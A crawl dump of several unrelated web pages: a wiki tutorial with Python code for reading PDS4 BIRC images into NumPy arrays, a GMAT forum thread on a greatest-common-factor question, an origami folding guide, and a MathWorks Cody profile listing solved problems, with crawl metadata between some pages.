https://sbnwiki.astro.umd.edu/wiki/index.php?title=Example_Python_Reader_for_PDS4_Images&diff=prev&oldid=1427
# Example Python Reader for PDS4 Images

## Introduction

This document describes how to use Python to read an image from a PDS4 data product. The code does not validate the label; it reads the data based on the label keywords. The code below is limited to reading BOPPS BIRC images, but can serve as an example for other arrays.

## Requirements

This example assumes the user is running Python 2.7 with a recent NumPy package installed. The visualization example uses matplotlib.

## Goal and Method

The goal is to read an image from a BOPPS BIRC data product into a NumPy array. We provide the script with the name of the label, and the script will then:

1. Open the label.
2. Find the data product file name.
3. Determine the Array_2D_Image data type and shape.
4. Read in the data array.
5. Return the array.

## Implementation

For this basic example, the reader is a function in a module named birc. The user calls a single function, birc.read_image(), passing the name of the label as the first argument. The function loads the label using the ElementTree module and finds the first Array_2D_Image element to read. A second function, read_pds4_array(), determines the correct data type and shape, then reads the data from the file. A class designed specifically for PDS4 Array_2D_Image objects, aptly named PDS4_Array_2D_Image, is initialized with the data, the label describing the data, and the local_identifier of the array. The local_identifier is not required by PDS4, but it is present in the BIRC labels, so our class assumes it is included. The class then determines the image orientation. The image is stored in the class attribute data. A display_data attribute is also provided, which can be used for displaying the image with the origin in the lower left corner. The code is listed below.

## Example

Using the birc.py module listed below, this example reads in an image, zeros out the first 10 rows of the array, then displays the data with matplotlib.

```
import birc
import matplotlib.pyplot as plt

# read the image, given the name of its PDS4 label file
im = birc.read_image('birc_image_label.xml')

# the image is im.data
# the image for displaying purposes is im.display_data

# zero out the first 10 rows
im.data[:10] = 0

# display the result
plt.clf()
plt.imshow(im.display_data, origin='lower')
plt.draw()
```

## birc.py

```
"""
birc --- Example PDS4 Array_2D_Image reader for BOPPS/BIRC data
===============================================================

Example
-------

import birc
import matplotlib.pyplot as plt

im = birc.read_image('birc_image_label.xml')

# array is im.data
# array for displaying is im.display_data

plt.clf()
plt.imshow(im.display_data, origin='lower')
plt.draw()

Classes
-------
PDS4_Array_2D_Image - A PDS4 2D image.

Functions
---------
read_image - Read a BIRC image described by a PDS4 label file.

"""

import numpy as np
import xml.etree.ElementTree as ET


class PDS4_Array_2D_Image(object):
    """A PDS4 array for 2D images, with limited functionality.

    Parameters
    ----------
    data : ndarray
        The data.
    local_identifier : string
        The label's local_identifier for this array.
    label : ElementTree
        The PDS4 label that contains the description of the array.

    Attributes
    ----------
    data : ndarray
        See Parameters.
    label : ElementTree
        See Parameters.
    local_identifier : string
        See Parameters.
    horizontal_axis : int
        The index of the horizontal axis for display.
    vertical_axis : int
        The index of the vertical axis for display.
    display_data : ndarray
        The data array rotated into display orientation, assuming the
        display will draw the image with the origin in the lower left
        corner.  The vertical axis will be axis 0, the horizontal axis
        will be axis 1.

    """

    def __init__(self, data, local_identifier, label):
        self.data = data
        self.local_identifier = local_identifier
        self.label = label
        self._orient()

    def _orient(self):
        """Set object image orientation attributes."""

        # namespace definitions
        ns = {'pds4': 'http://pds.nasa.gov/pds4/pds/v1',
              'disp': 'http://pds.nasa.gov/pds4/disp/v1'}

        # find local_identifier in File_Area_Observational
        array = None
        xpath = ('./pds4:File_Area_Observational/pds4:Array_2D_Image/'
                 '[pds4:local_identifier]')
        for e in self.label.findall(xpath, ns):
            this_local_id = e.find('./pds4:local_identifier', ns).text.strip()
            if this_local_id == self.local_identifier:
                array = e
                break

        assert array is not None, \
            "Array_2D_Image with local_identifier == {} not found.".format(
                self.local_identifier)

        # find the display settings for local_identifier in
        # Display_Settings
        display_settings = None
        xpath = ('./pds4:Observation_Area/pds4:Discipline_Area/'
                 'disp:Display_Settings')
        for e in self.label.findall(xpath, ns):
            lir = e.find('./disp:Local_Internal_Reference', ns)
            reference = lir.find('./disp:local_identifier_reference',
                                 ns).text.strip()
            if reference == self.local_identifier:
                display_settings = e
                break

        assert display_settings is not None, \
            "Display_Settings for local_identifier == {} not found.".format(
                self.local_identifier)

        # determine display directions
        display_dir = display_settings.find('./disp:Display_Direction', ns)
        h = display_dir.find('./disp:horizontal_display_direction', ns)
        v = display_dir.find('./disp:vertical_display_direction', ns)
        self.display_directions = (h.text.strip(), v.text.strip())

        # determine horizontal and vertical axes
        haxis = display_dir.find('./disp:horizontal_display_axis',
                                 ns).text.strip()
        for axis in array.findall('./pds4:Axis_Array', ns):
            if axis.find('./pds4:axis_name', ns).text.strip() == haxis:
                sn = int(axis.find('./pds4:sequence_number', ns).text.strip())
                self.horizontal_axis = sn - 1

        vaxis = display_dir.find('./disp:vertical_display_axis',
                                 ns).text.strip()
        for axis in array.findall('./pds4:Axis_Array', ns):
            if axis.find('./pds4:axis_name', ns).text.strip() == vaxis:
                sn = int(axis.find('./pds4:sequence_number', ns).text.strip())
                self.vertical_axis = sn - 1

    @property
    def display_data(self):
        # only need to roll one axis for a 2D image
        im = np.rollaxis(self.data, self.vertical_axis)
        if 'Right to Left' in self.display_directions:
            im = im[:, ::-1]
        if 'Top to Bottom' in self.display_directions:
            im = im[::-1]
        return im


def read_image(file_name):
    """Read a BIRC image described by a PDS4 label file.

    Only the first Array_2D_Image is returned, based on BIRC PDS4
    sample data files.

    Parameters
    ----------
    file_name : string
        The name of the PDS4 label file describing the BIRC image.

    Returns
    -------
    im : PDS4_Array_2D_Image
        The image.

    Raises
    ------
    NotImplementedError

    """
    import os

    # namespace definitions
    ns = {'pds4': 'http://pds.nasa.gov/pds4/pds/v1'}

    label = ET.parse(file_name)

    # Find the first File_Area_Observational element with an Array_2D_Image
    find = label.findall(
        'pds4:File_Area_Observational/[pds4:Array_2D_Image]', ns)

    if len(find) > 1:
        raise NotImplementedError("Multiple Array_2D_Image elements found.")
    else:
        file_area = find[0]

    data, local_identifier = read_pds4_array(
        file_area, './pds4:Array_2D_Image', ns,
        dirname=os.path.dirname(file_name))

    return PDS4_Array_2D_Image(data, local_identifier, label)


def read_pds4_array(file_area, xpath, ns, dirname=''):
    """Read a PDS4 array from a data file.

    Parameters
    ----------
    file_area : ElementTree Element
        The File_Area_Observational element from the PDS4 label.
    xpath : string
        The array is described by the element `file_area.find(xpath)`.
    ns : dictionary
        Namespace definitions for `file_area.find()`.
    dirname : string
        The original data label's directory name, used to find the array
        file.

    Returns
    -------
    data : ndarray
        The array.
    local_identifier : string
        The local_identifier of the array, or `None` if not present.

    Raises
    ------
    NotImplementedError

    """
    import os

    file_name = file_area.find('pds4:File/pds4:file_name', ns).text.strip()
    file_name = os.path.join(dirname, file_name)

    array = file_area.find(xpath, ns)

    local_identifier = array.find('./pds4:local_identifier', ns).text.strip()

    # Examine the data type, and translate it into a numpy dtype
    pds4_to_numpy_dtypes = {
        "IEEE754MSBSingle": '>f4'
    }
    try:
        k = array.find('pds4:Element_Array/pds4:data_type', ns).text.strip()
        dtype = np.dtype(pds4_to_numpy_dtypes[k])
    except KeyError:
        raise NotImplementedError(
            "PDS4 data_type {} not implemented.".format(k))

    # determine the shape
    ndim = int(array.find('pds4:axes', ns).text.strip())
    shape = ()
    for i in range(ndim):
        k = ('./pds4:Axis_Array/[pds4:sequence_number="{}"]/'
             'pds4:elements').format(i + 1)
        shape += (int(array.find(k, ns).text.strip()), )

    # verify axis order
    axis_index_order = array.find('./pds4:axis_index_order', ns).text.strip()
    assert axis_index_order == 'Last Index Fastest', \
        "Invalid axis order: {}".format(axis_index_order)

    # read the data, starting at the byte offset given in the label
    offset = array.find('./pds4:offset', ns)
    assert offset.attrib['unit'].lower() == 'byte', "Invalid file offset unit"
    with open(file_name, 'rb') as inf:
        inf.seek(int(offset.text.strip()))
        data = np.fromfile(inf, dtype, count=np.prod(shape)).reshape(shape)

    return data, local_identifier
```
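The byte-offset read at the heart of read_pds4_array() can be exercised without a PDS4 label. A minimal sketch, using a temporary binary file and made-up values (the 4-byte header and 2x3 shape are illustrative only):

```python
import os
import tempfile

import numpy as np

# Build a small binary file: a 4-byte header followed by six
# big-endian 32-bit floats (the IEEE754MSBSingle type used by BIRC).
values = np.arange(6, dtype='>f4').reshape((2, 3))
fd, file_name = tempfile.mkstemp()
with os.fdopen(fd, 'wb') as outf:
    outf.write(b'\x00' * 4)          # stand-in for label/header bytes
    outf.write(values.tobytes())

# Read it back the way read_pds4_array does: seek to the byte offset
# given in the label, then read count elements and reshape.
offset, shape, dtype = 4, (2, 3), np.dtype('>f4')
with open(file_name, 'rb') as inf:
    inf.seek(offset)
    data = np.fromfile(inf, dtype, count=np.prod(shape)).reshape(shape)

os.remove(file_name)
print(data[1, 2])   # -> 5.0
```

Opening the file in binary mode ('rb') matters here: a text-mode read can corrupt the byte stream on some platforms.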
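The orientation logic in the display_data property reduces to an axis roll plus optional flips. A standalone sketch with a hypothetical helper, to_display(), that mirrors the property (the sample array and display directions are illustrative, not from a real BIRC label):

```python
import numpy as np

def to_display(data, vertical_axis, display_directions):
    """Mimic PDS4_Array_2D_Image.display_data: put the vertical axis
    first, then flip so the origin lands in the lower left corner."""
    im = np.rollaxis(data, vertical_axis)
    if 'Right to Left' in display_directions:
        im = im[:, ::-1]
    if 'Top to Bottom' in display_directions:
        im = im[::-1]
    return im

# A 2x3 array whose vertical axis is axis 0, displayed top to bottom:
data = np.array([[0, 1, 2],
                 [3, 4, 5]])
disp = to_display(data, 0, ('Left to Right', 'Top to Bottom'))
# row order is reversed: [[3, 4, 5], [0, 1, 2]]
```

With ('Left to Right', 'Bottom to Top') directions the array is already in display orientation and comes back unchanged.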
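The namespaced findall() calls used throughout birc.py can be tried on a toy document. A sketch with a made-up, minimal XML fragment (element names follow the PDS4 pattern, but this is not a complete or valid PDS4 label):

```python
import xml.etree.ElementTree as ET

# prefix -> namespace URI mapping used for all searches
ns = {'pds4': 'http://pds.nasa.gov/pds4/pds/v1'}

# Made-up fragment for illustration only.
label = ET.fromstring("""
<Product_Observational xmlns="http://pds.nasa.gov/pds4/pds/v1">
  <File_Area_Observational>
    <Array_2D_Image>
      <local_identifier> IMAGE_1 </local_identifier>
    </Array_2D_Image>
  </File_Area_Observational>
</Product_Observational>
""")

# Elements in the default namespace must be qualified with the prefix
# defined in `ns` when searching.
ids = [e.find('./pds4:local_identifier', ns).text.strip()
       for e in label.findall('./pds4:File_Area_Observational/'
                              'pds4:Array_2D_Image', ns)]
print(ids)   # -> ['IMAGE_1']
```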
https://gmatclub.com/forum/the-greatest-common-factor-of-16-and-the-positive-integer-n-109870.html?sort_by_oldest=true
# The greatest common factor of 16 and the positive integer n

**ajit257:**

The greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?

A. 3
B. 14
C. 30
D. 42
E. 70

I am not so sure about the OA.

**VeritasKarishma (Veritas Prep GMAT Instructor):**

GCF(n, 16) = 4. This means 4 is a factor of n but 8 and 16 are not. (If 8 were also a factor of n, the GCF would have been 8; similarly for 16.)

GCF(n, 45) = 3. This means 3 is a factor of n but 9 and 5 are not, by the same logic.

210 = 2*3*5*7. n has 4 and 3 as factors and does not have 5 as a factor, so the GCF of n and 210 could be 6 (if 7 is not a factor of n) or 42 (if 7 is a factor of n).

Note: 3 is definitely not the GCF of n and 210, because the two numbers have at least 3*2 in common, so the GCF has to be at least 6.

**AmrithS:**

Let's try the prime box approach. A prime box is simply the collection of all prime factors of a given number.

1. Prime box of 16 = |2, 2, 2, 2|
2. Prime box of 45 = |3, 3, 5|
3. Prime box of n = |2, 2, 3, ...|
4. Prime box of 210 = |2, 3, 5, 7|

From (3) and (4), the GCF of n and 210 must be a multiple of 6, so we can eliminate A, B, and E.

From (2) and (3), n is not a multiple of 5; if it were, the GCF of n and 45 would have been 15. So we can eliminate C.

The only remaining choice is D.

**ajit257:**

Thanks, Karishma. My doubt is exactly the same thing, but for 16: how can 42 be correct if n and 16 have a GCF of 4?

**VeritasKarishma:**

Because 210 has only one 2. Even though n has 4 as a factor, 210 does not, so the GCF of n and 210 does not have 4 as a factor. Does it make sense now?

**ajit257:**

So, say another choice given had been 6: what would the answer have been?

**VeritasKarishma:**

Then there would have been two correct options, 6 and 42: either can be the GCF of n and 210, depending on what exactly n is. The GMAT never has two correct options, so such a scenario is not possible; only one of 6 and 42 would be in the answer choices.

**Bunuel (Math Expert):**

The greatest common factor of 2^4 = 16 and n is 4, so n is a multiple of 2^2 = 4 but not of the higher powers of 2, such as 2^3 = 8 or 2^4 = 16; if it were, the greatest common factor of 16 and n would be more than 4.

The greatest common factor of 3^2*5 = 45 and n is 3, so n is a multiple of 3 but not of higher powers of 3, and not of 5; if it were, the greatest common factor of 45 and n would be more than 3.

So n is a multiple of 2^2*3 = 12, not a multiple of higher powers of 2 or 3, and not a multiple of 5 (n = 12x, where x is any positive integer not divisible by 2, 3, or 5). Now, since 210 = 2*3*5*7, the greatest common factor of n and 210 could be 6 or 6*7 = 42 (if 7 is a factor of n). Answer: D.

**A forum member:**

You can do the prime boxes.

Prime box of 16: 2, 2, 2, 2
Prime box of 45: 3, 3, 5
Prime box of 210: 2, 3, 5, 7

So n has at least two 2's and one 3, but no 5. Checking the alternatives:

A) Wrong: n and 210 share at least one 2 and one 3.
B) Wrong again: no 3 in 14.
C) Wrong: 30 has a 5.
D) Correct: the prime box of 42 is 2, 3, 7, which meets all the requirements.
E) Wrong: the prime box of 70 has 2, 7, and 5.

**Another member:**

Let me try to explain in a simpler way.

GCF(16, n) = 4 = 2^2 and 16 = 2^4, so the prime box of n contains 2^2 plus unknown factors.
GCF(45, n) = 3 and 45 = 3^2*5, so the prime box of n contains 3^1 plus unknown factors.

Overall, the prime box of n is 2^2, 3^1, plus unknowns. Now 210 = 2*3*5*7, so the GCF of n and 210 could be 3^1 * 2^1 * 7^1 (not 5, as shown above, but a 7 is possible). Thus a GCF of 42 is possible here. Hope this helps.

**Another member:**

Simple explanation? First, do a factor tree for each number. You'll see that 5 can't be a factor of n (otherwise it would have been part of the greatest common factor of n and 45). The highest factor that could theoretically exist between n and 210 is therefore the product of the factors of 210 besides those we've ruled out: 210 factors into 2 * 3 * 5 * 7, and we've ruled out 5, so 2 * 3 * 7 = 42. The answer is D.

If the question asked for the highest factor that we KNOW exists rather than one that COULD exist, the answer would be 6, since 2 and 3 are both factors of n as well as of 210.

**PathFinder007:**

Hi Bunuel, I have followed this up to "n is a multiple of 2^2*3 = 12". Why are we not considering 5, but we are considering 7? Thanks.

**Bunuel:**

Notice that the GCF of 45 (a multiple of 5) and n is 3 (not a multiple of 5). This means that n itself cannot be a multiple of 5.

As for 7: we know for sure that 2 and 3 are factors of n and that 5 is not. We know nothing about its other primes, so any prime greater than 5 could theoretically be a factor of n.

**Another member:**

GCF(16, n) = 4 and GCF(n, 45) = 3, so n must be 4 * 3 = 12 or a multiple of 12 to satisfy the given GCF values.

210 = 2 * 3 * 5 * 7. The primes 2, 3, and 5 are already constrained by 16 and 45; including more of them would disturb the GCF values already given. Only 7 stands out. So take n = 12 * 7 = 84: the GCF of 84 and 210 is 42.

**SravnaTestPrep:**

n has to be a multiple of (2*2)*3 = 12. A common factor between 210 = 2*3*5*7 and any multiple of 12 is 2*3 = 6, so the GCF of n and 210 has to be a multiple of 6. The two choices that are multiples of 6 are 30 and 42. But n is not a multiple of 5, so 30 can be ruled out, and the answer is 42.

**Another member:**

This problem works best if you break it down into pieces with Venn diagrams.

16 and n have a GCF of 4 = 2^2, so n has at least two 2's as factors.

45 and n share one factor, 3, so n has at least one 3 and two 2's (3*2^2).

The next step is to break 210 down into 2*3*5*7. 5 is not a possible factor of n, because otherwise it would have been part of the GCF of 45 and n. But 7 could be a common divisor, because it is not expressly forbidden anywhere. So the GCF in this case is 2*3*7 = 42.

**fskilnik (GMATH):**

$$?\,\,\,:\,\,\,GCF\left( {n\,,2 \cdot 3 \cdot 5 \cdot 7} \right)\,\,\underline {{\rm{could}}\,\,{\rm{be}}}$$

$$n \ge 1\,\,\,{\mathop{\rm int}}$$

$$GCF\left( {{2^4},n} \right) = {2^2}\,\,\,\, \Rightarrow \,\,\,\,\,\left\{ \matrix{ {n \over {{2^2}}} = {\mathop{\rm int}} \hfill \cr {n \over {{2^{\, \ge \,3}}}} \ne {\mathop{\rm int}} \hfill \cr} \right.$$

$$GCF\left( {{3^2} \cdot 5,n} \right) = 3\,\,\,\, \Rightarrow \,\,\,\,\,\left\{ \matrix{ {n \over 3} = {\mathop{\rm int}} \hfill \cr {n \over {{3^{\, \ge \,2}}}} \ne {\mathop{\rm int}} \,\,\,\,\,;\,\,\,{n \over 5} \ne {\mathop{\rm int}} \,\, \hfill \cr} \right.$$

$$? = {2^1} \cdot {3^1} \cdot {7^{0\,{\rm{or}}\,1}}\,\,\,\,\,\mathop \Rightarrow \limits^{{\rm{alternatives}}\,!} \,\,\,\,42\,\,\,\,\,\,\left( D \right)$$

**ScottTargetTestPrep (Target Test Prep):**

If the greatest common factor (GCF) of 16 and n is 4, n could be 4, 12, 20, 28, 36, etc. In other words, n is an odd multiple of 4 (4 times an odd number).

Since the GCF of 45 and n is 3, and since 45 and 4 have no common factor other than 1, n must be a multiple of 3 x 4 = 12. However, since n is an odd multiple of 4, n actually has to be an odd multiple of 12 as well.

If n = 12, we see that GCF(45, 12) = 3 and GCF(12, 210) = 6. However, 6 is not one of the choices.

If n = 36, we see that GCF(45, 36) = 9, but GCF(45, n) is supposed to be 3, so n can't be 36.

If n = 60, we see that GCF(45, 60) = 15, but GCF(45, n) is supposed to be 3, so n can't be 60.

If n = 84, we see that GCF(45, 84) = 3 and GCF(84, 210) = 42, and 42 is one of the choices. Answer: D.

**Kinshook:**

Given: the greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Asked: which of the following could be the greatest common factor of n and 210?

n = 4k, where k is not a multiple of 2.
45 = 3^2*5, so n = 3m, where m is not a multiple of 3 or 5.
210 = 2*3*5*7, so n = 4*3*k, where k is not divisible by 2, 3, or 5.

gcd(n, 210) = 2*3 = 6 or 2*3*7 = 42.

IMO D.
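The two candidate values of n that come up in the thread, n = 12 (GCF of 6) and n = 84 (GCF of 42), can be checked directly with the standard library; a quick sketch:

```python
from math import gcd

# n must satisfy gcd(16, n) == 4 and gcd(45, n) == 3.
# n = 12 gives gcd(n, 210) = 6; n = 84 = 12 * 7 gives 42.
for n, expected in [(12, 6), (84, 42)]:
    assert gcd(16, n) == 4
    assert gcd(45, n) == 3
    assert gcd(n, 210) == expected

print(gcd(84, 210))   # -> 42
```

Both values meet the constraints, which is why the answer depends on 42 (not 6) appearing among the choices.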
{"ft_lang_label":"__label__en","ft_lang_prob":0.8971982,"math_prob":0.95628023,"size":17118,"snap":"2020-24-2020-29","text_gpt3_token_len":5762,"char_repetition_ratio":0.23337619,"word_repetition_ratio":0.45399305,"special_character_ratio":0.3779063,"punctuation_ratio":0.1538649,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9968326,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-13T15:24:20Z\",\"WARC-Record-ID\":\"<urn:uuid:e05cf605-4c8f-405e-b732-e31a6605e775>\",\"Content-Length\":\"987586\",\"Content-Type\":\"application/http; 
msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d16b043c-38a0-4750-aaef-1c373d739f2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e3af457-0684-4365-8f79-93c183054c6c>\",\"WARC-IP-Address\":\"198.11.238.99\",\"WARC-Target-URI\":\"https://gmatclub.com/forum/the-greatest-common-factor-of-16-and-the-positive-integer-n-109870.html?sort_by_oldest=true\",\"WARC-Payload-Digest\":\"sha1:SFMECUVXSQP7PEVZ7WQEJWJXHRAXTBRJ\",\"WARC-Block-Digest\":\"sha1:CURWFZ2S42KI7CFLI55YGHYYA5XUED5M\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657145436.64_warc_CC-MAIN-20200713131310-20200713161310-00435.warc.gz\"}"}
https://www.origami-resource-center.com/triangle-from-a-rectangle.html
[ "# Make a Triangle from a Rectangle", null, "Some origami models start with an equilateral triangle instead of a square sheet of paper. In this case, you need to make the triangular sheets of paper before you start. This page will show you how to get a triangle from a rectangular sheet of paper. If you are starting with a square sheet of paper, or a rectangle that is not quite long enough, then click here or here.", null, "#### Make a Triangle from a Rectangle\n\n1. Fold and unfold the rectangular sheet of paper in half lengthwise.\n\n2. Fold the top-right corner of the paper down so the corner meets the crease made in step 1 (join the dots). The crease made should intersect with the bottom-right corner.\n\n3. Fold left side of the paper over the flap made in step 2. Use the raw edge of the flap as a guide to position this fold.\n\n4. Unfold and cut along the creases to get an equilateral triangle. Easy." ]
[ null, "https://www.origami-resource-center.com/images/150xNxshape-Triangle-From-Rectangle-icon.jpg.pagespeed.ic.MM9UaeB2tO.jpg", null, "https://www.origami-resource-center.com/images/shape-Triangle-From-Rectangle.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8622032,"math_prob":0.8829964,"size":875,"snap":"2019-51-2020-05","text_gpt3_token_len":197,"char_repetition_ratio":0.1423651,"word_repetition_ratio":0.024691358,"special_character_ratio":0.216,"punctuation_ratio":0.07865169,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9522092,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-12T15:12:51Z\",\"WARC-Record-ID\":\"<urn:uuid:cb094df7-98e5-4ee7-8d54-c73613b97c19>\",\"Content-Length\":\"19022\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:63045cb7-8083-4092-aeab-0f506b703aad>\",\"WARC-Concurrent-To\":\"<urn:uuid:b73d49d7-4f5f-4ea8-8635-9998f202a73a>\",\"WARC-IP-Address\":\"173.247.218.162\",\"WARC-Target-URI\":\"https://www.origami-resource-center.com/triangle-from-a-rectangle.html\",\"WARC-Payload-Digest\":\"sha1:NJIWGIH47L2KJFQDTJC6FQHGJLMTNAEZ\",\"WARC-Block-Digest\":\"sha1:UELMESRB7JW7YTEYQ7WN3WJZMCAYPIMT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540543850.90_warc_CC-MAIN-20191212130009-20191212154009-00484.warc.gz\"}"}
https://in.mathworks.com/matlabcentral/profile/authors/14644008?detail=all
[ "Community Profile", null, "# Dev Gupta\n\nLast seen: 2 months ago Active since 2019\n\nLearner\n\n#### Statistics\n\n•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "#### Content Feed\n\nView by\n\nSolved\n\nDecimation\nWhen dealing to the Roman Army, the term decimate meant that the entire unit would be broken up into groups of ten soldiers, and...\n\n1 year ago\n\nSolved\n\nThere are 10 types of people in the world\nThose who know binary, and those who don't. The number 2015 is a palindrome in binary (11111011111 to be exact) Given a year...\n\n1 year ago\n\nSolved\n\nBinary numbers\nGiven a positive, scalar integer n, create a (2^n)-by-n double-precision matrix containing the binary numbers from 0 through 2^n...\n\n1 year ago\n\nSolved\n\nImplement a bubble sort technique and output the number of swaps required\nA bubble sort technique compares adjacent items and swaps them if they are in the wrong order. This is done recursively until al...\n\n1 year ago\n\nSolved\n\nDot Product\n\n1 year ago\n\nProblem\n\nDot Product\n\n1 year ago | 0 | 40 solvers\n\nSolved\n\nFinding peaks\nFind the peak values in the signal. The peak value is defined as the local maxima. For example, x= [1 12 3 2 7 0 3 1 19 7]; ...\n\n1 year ago\n\nSolved\n\nMax index of 3D array\nGiven a three dimensional array M(m,n,p) write a code that finds the three coordinates x,y,z of the Maximum value. 
Example ...\n\n1 year ago\n\nSolved\n\nReference Index Number\nGiven a reference set R of elements (each unique but identical in type), and a list V of elements drawn from the set R, possibly...\n\n1 year ago\n\nSolved\n\nSet a diagonal\nGiven a matrix M, row vector v of appropriate length, and diagonal index d (where 0 indicates the main diagonal and off-diagonal...\n\n1 year ago\n\nSolved\n\nCount consecutive 0's in between values of 1\nSo you have some vector that contains 1's and 0's, and the goal is to return a vector that gives the number of 0's between each ...\n\n1 year ago\n\nSolved\n\nCreate an n-by-n null matrix and fill with ones certain positions\nThe positions will be indicated by a z-by-2 matrix. Each row in this z-by-2 matrix will have the row and column in which a 1 has...\n\n1 year ago\n\nSolved\n\nGenerate Square Wave\nGenerate a square wave of desired length, number of complete cycles and duty cycle. Here, duty cycle is defined as the fraction ...\n\n1 year ago\n\nSolved\n\nBinary code (array)\nWrite a function which calculates the binary code of a number 'n' and gives the result as an array(vector). Example: Inpu...\n\n1 year ago\n\nSolved\n\nRelative ratio of \"1\" in binary number\nInput(n) is positive integer number Output(r) is (number of \"1\" in binary input) / (number of bits). Example: * n=0; r=...\n\n1 year ago\n\nSolved\n\nFind the longest sequence of 1's in a binary sequence.\nGiven a string such as s = '011110010000000100010111' find the length of the longest string of consecutive 1's. In this examp...\n\n1 year ago\n\nSolved\n\nGiven an unsigned integer x, find the largest y by rearranging the bits in x\nGiven an unsigned integer x, find the largest y by rearranging the bits in x. 
Example: Input x = 10 Output y is 12 ...\n\n1 year ago\n\nSolved\n\nBit Reversal\nGiven an unsigned integer _x_, convert it to binary with _n_ bits, reverse the order of the bits, and convert it back to an inte...\n\n1 year ago\n\nSolved\n\nConverting binary to decimals\nConvert binary to decimals. Example: 010111 = 23. 110000 = 48.\n\n1 year ago\n\nSolved\n\nFind out sum and carry of Binary adder\nFind out sum and carry of a binary adder if previous carry is given with two bits (x and y) for addition. Examples Previo...\n\n1 year ago\n\nSolved\n\n~~~~~~~ WAVE ~~~~~~~~~\n|The WAVE generator| Once upon a time there was a river. 'Sum' was passing by the river. He saw the water of the river that w...\n\n1 year ago\n\nSolved\n\nRemove the air bubbles\nGiven a matrix a, return a matrix b in which all the zeros have \"bubbled\" to the top. That is, any zeros in a given column shoul...\n\n1 year ago\n\nSolved\n\nFind Logic 32\n\n1 year ago\n\nProblem\n\nFind Logic 32\n\n1 year ago | 1 | 30 solvers\n\nSolved\n\nBack to basics 15 - classes\nCovering some basic topics I haven't seen elsewhere on Cody. Return the class of the input variable.\n\n1 year ago\n\nSolved\n\nFind Logic 31\n\n1 year ago\n\nProblem\n\nFind Logic 31\n\n1 year ago | 1 | 23 solvers\n\nSolved\n\nFind Logic 30\n\n1 year ago\n\nProblem\n\nFind Logic 30\n\n1 year ago | 1 | 24 solvers\n\nSolved\n\nPattern matching\nGiven a matrix, m-by-n, find all the rows that have the same \"increase, decrease, or stay same\" pattern going across the columns...\n\n1 year ago" ]
[ null, "https://in.mathworks.com/responsive_image/150/150/0/0/0/cache/matlabcentral/profiles/14644008_1548563151426_DEF.jpg", null, "https://in.mathworks.com/matlabcentral/profile/hunt/MLC_Treasure_Hunt_badge.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/famous.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/quiz_master.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/curator.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/mathworks_generic_group.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/community_authored_group.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/puzzler.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/promoter.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/speed_demon.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/creator.png", null, "https://in.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/solver.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79330736,"math_prob":0.9373284,"size":4556,"snap":"2021-43-2021-49","text_gpt3_token_len":1267,"char_repetition_ratio":0.1761863,"word_repetition_ratio":0.075,"special_character_ratio":0.27238807,"punctuation_ratio":0.12345679,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99282527,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-03T17:14:51Z\",\"WARC-Record-ID\":\"<urn:uuid:387b782c-9418-4e60-b578-8866f67b63d9>\",\"Content-Length\":\"116930\",\"Content-Type\":\"application/http; 